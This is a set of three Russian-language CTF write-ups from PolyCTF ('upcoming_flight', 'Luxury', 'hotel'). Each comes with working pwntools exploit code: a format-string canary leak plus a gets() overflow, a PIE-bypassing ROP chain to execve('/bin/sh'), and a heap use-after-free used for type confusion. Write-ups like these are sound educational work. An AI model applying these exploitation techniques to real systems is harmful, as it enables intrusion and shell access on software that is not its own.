#pwn
PolyCTF. Write-up "upcoming_flight" от @wcovkej

Первым делом смотрим наш файл через checksec и понимаем, что PIE выключен, зато есть канарейка.

Чтобы получить флаг, нам нужен билет, но получить мы его не можем. Посмотрим код программы внимательнее и увидим, что в нем есть две уязвимости: Форматная строка и переполнение буфера (использование небезопасной функции gets)

В функции print_ticket c помощью printf сможем ликнуть канарейку, а дальше уже переполнить буфер и вызвать функциию arrive, только не с начала, а прямо с строки system("cat flag");

Окей, погнали писать сплоит:

from pwn import *

io = remote('tasks.polyctf.ru', 30007)

addr_win = 0x40136D #Адрес строки system("cat flag")

io.recvuntil(b'> ')
io.sendline(b'2') #Вызываем функцию print_ticket
io.recvuntil(b': ') 
io.sendline(b'%15$p') #Вместо ФИО отправляем форматную строку, которая выдаст нам канарейку
io.recvuntil(b': ')
canary = int(io.recvline()[:-1], 16)
print("[DEBUG] >>> Canary leak: ", hex(canary))
io.recvuntil(b': ') #Далее, вместо посадочного талона, засылаем наш сплоит
pl = b'A' * 40 # Падинг. Переполняем буфер
pl += p64(canary) # Засылаем канарейку, чтобы программа не выдала нам ошибку
pl += b'B' * 8 # RBP
pl += p64(addr_win)
io.sendline(pl)

io.interactive()

Круто! Получаем флаг: PolyCTF{иди решай, хитрец} и идем пить чай :)

#pwn
PolyCTF. Write-up "Luxury" от @wcovkej

Итак, первым делом проверим наш файл через checksec:

RELRO           STACK CANARY      NX            PIE            RPATH      RUNPATH      Symbols         FORTIFY

Partial RELRO   No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   49 Symbols        No

Канарейки нет, уже хорошо, но зато включен PIE, значит адреса функций каждый раз разные. Запомним.

Теперь кратко разберем, как работает программа:

1) Просит ввести пароль и логин. В данном случае логин - admin, пароль - V3rY_sTroNg_p1ss

2) Как только мы залогинились, у нас доступен основной функционал: вывод адресов функций, в том числе и функции login.

Если мы хорошо посмотрим, то в функции login есть переполнение буфера, а именно на вводе пароля. Массив под пароль 32 байта, а вводим мы 112. Также через ropper узнаем, что в таске есть аж целых 5 гаджетов! pop (rdi, rsi, rdx, rax), а также syscall. Интересно, но что дальше?

Наша цель - вызвать /bin/sh. Для этого нам нужно построить ROP цепочку: загрузить в rax число 0x3b (execve), в rdi адрес строки /bin/sh, rsi и rdx занулить, вызвать syscall ===> получаем шелл! Но не всё так просто :)

Во-первых, мы не знаем точных адресов гаджетов (включен PIE), во-вторых, в коде нет строки /bin/sh, поэтому нам нужно взять ее из libc, а для этого нужно ее ликнуть.

Эксплоит я отправлю отдельно файлом, здесь я вкратце распишу его алгоритм:

1) Логинимся, далее получаем адрес printf, puts, fgets и идем в libc.blukat.me, вбиваем все три функции, указываем последние три символа адресов и находим версию LIBC. Таким образом мы определили точную версию либы и теперь знаем все смещения. Прибавляем к адресу printf число 0x143a81 и получаем адрес строки /bin/sh.

2) Далее нам нужно узнать адреса гаджетов. Для этого получаем адрес функции login и вычитаем его оффсет, который взяли из IDA. Вычитаем 0x1179 и получаем адрес базы программы. Теперь вычисляем адреса для всех 5 гаджетов:

pop_rdi = base_addr + 0x1460
pop_rax = base_addr + 0x1464
pop_rsi = base_addr + 0x1462
pop_rdx = base_addr + 0x1468
syscall = base_addr + 0x1466

3) Всё готово! Теперь составляем пейлоад и отправляем серваку:

pl = b'A' * 40
pl += p64(pop_rax)
pl += p64(0x3b)
pl += p64(pop_rdi)
pl += p64(binsh_addr)
pl += p64(pop_rdx)
pl += p64(0)
pl += p64(pop_rsi)
pl += p64(0)
pl += p64(syscall)

Получаем шелл и читаем флаг. Nice!

#pwn
PolyCTF. Write-up "hotel" от @tonysdx

Задача на эксплуатацию хипы, а именно UAF и Type Confusion.

Зайдя в таск и немного пореверсив, мы обнаруживаем, что у нас есть следующая структура:

struct user
{
  char gap[16];
  long some_number;
  char *login;
  char *password;
};

В функциях регистрации и логина уязвимостей нет (разве что введя 128-байтовый пароль, мы можем переписать первый байт логина на 0, но это нам ничего не даст), копаем дальше.

Также есть функция read_secret, при вызове которой проверяется, что some_number у curr_user равен 31337. Легально мы получить такое значение не можем, поэтому надо эксплуатировать чанки.

Главная уязвимость кроется в функции delete_user. Суть в том, что для пользователя выделяется чанк, размером в 40 байт. Однако при удалении, мы не выходим из аккаунта и поинтер curr_user после освобождения при помощи free указывает на освобожденный чанк.

Просмотрев код далее мы находим, что в функции write_msg мы можем контролировать размер выделяемого под сообщение чанка, что открывает возможность для эксплуатации ранее найденной уязвимости. Суть в том, что на месте освобожденного чанка при следующем вызове malloc будет аллоцирован новый чанк, если там будет достаточно места. В нашем случае, освобождая чанк размером в 40 байт, мы можем аллоцировать чанк сообщения с таким же размером (чтобы места точно хватило), и тогда curr_user будет указывать на новый чанк сообщения, данные внутри которого мы контролируем. То есть в теле сообщения мы можем создать фейковую структуру пользователя, у которого some_number будет равен 31337.

Алгоритм следующий:

1) Регистрируемся и заходим в аккаунт
2) Удаляем пользователя
3) Создаем сообщение размером в 40 байт (такое же по размеру, как и чанк пользователя)
4) В сообщении создаем структуру пользователя, у которого some_number равен 31337
5) Вызываем скрытый 5 пункт меню, проходим проверку и получаем флаг

Пример сплоита:

io = remote("host", port)

def choice(index: int):
    io.sendlineafter(b"> ", b"%d" % index)

# Register
choice(2)
io.sendlineafter(b": ", b"h4ck3r")
io.sendlineafter(b": ", b"h4ck3r")

# Login
choice(1)
io.sendlineafter(b": ", b"h4ck3r")
io.sendlineafter(b": ", b"h4ck3r")

# Delete user
choice(3)

# Create message with size as user
user_struct = flat({
    0: b"chill guy",
    16: p64(31337)
})
choice(1)
io.sendlineafter(b": ", b"40")
io.sendlineafter(b": ", user_struct)

# Secret read flag
choice(5)

io.interactive()